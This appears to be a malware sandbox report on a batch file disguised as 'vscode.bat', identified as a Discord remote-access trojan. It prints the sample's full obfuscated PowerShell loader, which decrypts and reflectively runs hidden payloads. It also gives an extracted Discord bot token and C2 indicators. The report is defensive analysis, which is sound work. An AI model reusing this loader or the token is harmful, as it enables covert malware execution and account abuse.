Analysis
-
max time kernel
51s -
max time network
47s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
14-04-2024 19:22
Static task
static1
Behavioral task
behavioral1
Sample
exploit.exe
Resource
win10v2004-20240412-en
Behavioral task
behavioral2
Sample
vscode.bat
Resource
win10v2004-20240412-en
Errors
General
-
Target
vscode.bat
-
Size
274KB
-
MD5
0d8058c9dafb33c14781290f74cff9f5
-
SHA1
505b9ec433f9c26319ad3b06eaed2f9579fb3d1d
-
SHA256
1e938491719616ade4bd63d17be73b26d6856fdca3c1255e99ab004ace719d4b
-
SHA512
886bae7d223072ee04852d9abce1aa05801ad50e6681cb4ed9a784d952e353fdf639713b706af8e1b7019422b32573ba75441e5cb60e5abdff908ad65f090b0b
-
SSDEEP
6144:aaH4va70scVkDAa5t8PL1ZHGoJtaCnK2RU+Xe/L:atR9VKAa5t8PBVdvXTXe/L
Malware Config
Extracted
discordrat
-
discord_token
MTIyMjg4ODc4NjY4MjQ1MDAwMA.GrWWth.lufsbZUbCt6RpsyO9yf6mU1zPT_mACVqxKnhtg
-
server_id
1229118384591994951
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4808 created 616 4808 powershell.exe 5 -
Blocklisted process makes network request 8 IoCs
flow pid Process 20 4808 powershell.exe 28 4808 powershell.exe 31 4808 powershell.exe 33 4808 powershell.exe 40 4808 powershell.exe 41 4808 powershell.exe 56 4808 powershell.exe 57 4808 powershell.exe -
Downloads MZ/PE file
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
flow ioc 33 discord.com 40 discord.com 41 discord.com 55 raw.githubusercontent.com 56 raw.githubusercontent.com 57 discord.com 27 discord.com 28 discord.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4808 set thread context of 4524 4808 powershell.exe 95 -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4808 powershell.exe 4808 powershell.exe 4808 powershell.exe 4524 dllhost.exe 4524 dllhost.exe 4524 dllhost.exe 4524 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4808 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeDebugPrivilege 4524 dllhost.exe Token: SeShutdownPrivilege 4808 powershell.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 4216 wrote to memory of 4808 4216 cmd.exe 87 PID 4216 wrote to memory of 4808 4216 cmd.exe 87 PID 4808 wrote to memory of 4524 4808 powershell.exe 95 PID 4808 wrote to memory of 4524 4808 powershell.exe 95 PID 4808 wrote to memory of 4524 4808 powershell.exe 95 PID 4808 wrote to memory of 4524 4808 powershell.exe 95 PID 4808 wrote to memory of 4524 4808 powershell.exe 95 PID 4808 wrote to memory of 4524 4808 powershell.exe 95 PID 4808 wrote to memory of 4524 4808 powershell.exe 95 PID 4808 wrote to memory of 4524 4808 powershell.exe 95 PID 4808 wrote to memory of 4524 4808 powershell.exe 95 PID 4808 wrote to memory of 4524 4808 powershell.exe 95 PID 4808 wrote to memory of 4524 4808 powershell.exe 95 PID 4524 wrote to memory of 616 4524 dllhost.exe 5 PID 4524 wrote to memory of 664 4524 dllhost.exe 7 PID 4524 wrote to memory of 960 4524 dllhost.exe 12 PID 4524 wrote to memory of 64 4524 dllhost.exe 13 PID 4524 wrote to memory of 408 4524 dllhost.exe 14 PID 4524 wrote to memory of 1040 4524 dllhost.exe 16 PID 4524 wrote to memory of 1116 4524 dllhost.exe 17 PID 4524 wrote to memory of 1132 4524 dllhost.exe 18 PID 4524 wrote to memory of 1180 4524 dllhost.exe 19 PID 4524 wrote to memory of 1188 4524 dllhost.exe 20 PID 4524 wrote to memory of 1284 4524 dllhost.exe 21 PID 4524 wrote to memory of 1316 4524 dllhost.exe 22 PID 4524 wrote to memory of 1336 4524 dllhost.exe 23 PID 4524 wrote to memory of 1392 4524 dllhost.exe 24 PID 4524 wrote to memory of 1440 4524 dllhost.exe 25 PID 4524 wrote to memory of 1564 4524 dllhost.exe 26 PID 4524 wrote to memory of 1580 4524 dllhost.exe 27 PID 4524 wrote to memory of 1636 4524 dllhost.exe 28 PID 4524 wrote to memory of 1688 4524 dllhost.exe 29 PID 4524 wrote to memory of 1732 4524 dllhost.exe 30 PID 4524 wrote to memory of 1760 4524 dllhost.exe 31 PID 4524 wrote to memory of 1844 4524 dllhost.exe 32 PID 4524 wrote to memory of 1944 4524 dllhost.exe 33 PID 4524 wrote to memory of 1956 4524 dllhost.exe 34 PID 4524 wrote to memory of 2004 4524 dllhost.exe 35 PID 4524 wrote to memory of 1864 4524 dllhost.exe 36 PID 4524 wrote to memory of 1876 4524 dllhost.exe 37 PID 4524 wrote to memory of 2108 4524 dllhost.exe 38
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:64
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5214bf81-d01f-4797-bfe3-8d6ae63db3cc}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4524
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1132
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1564
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1580
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1844
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1944
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:1876
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2108
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\vscode.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oG29TiHkUBL8raP9jBJGPGJU4GOleBpzsLsSqfKDVCk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z6QiZy5JAMbpfGsz1xHzww=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Gvikg=New-Object System.IO.MemoryStream(,$param_var); $ZCWGG=New-Object System.IO.MemoryStream; $dlrhf=New-Object System.IO.Compression.GZipStream($Gvikg, [IO.Compression.CompressionMode]::Decompress); $dlrhf.CopyTo($ZCWGG); $dlrhf.Dispose(); $Gvikg.Dispose(); $ZCWGG.Dispose(); $ZCWGG.ToArray();}function execute_function($param_var,$param2_var){ $DNmPg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqhCK=$DNmPg.EntryPoint; $tqhCK.Invoke($null, $param2_var);}$VBiSq = 'C:\Users\Admin\AppData\Local\Temp\vscode.bat';$host.UI.RawUI.WindowTitle = $VBiSq;$KCldM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($VBiSq).Split([Environment]::NewLine);foreach ($ixDfm in $KCldM) { if ($ixDfm.StartsWith(':: ')) { $LKmBs=$ixDfm.Substring(3); break; }}$payloads_var=[string[]]$LKmBs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4808
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82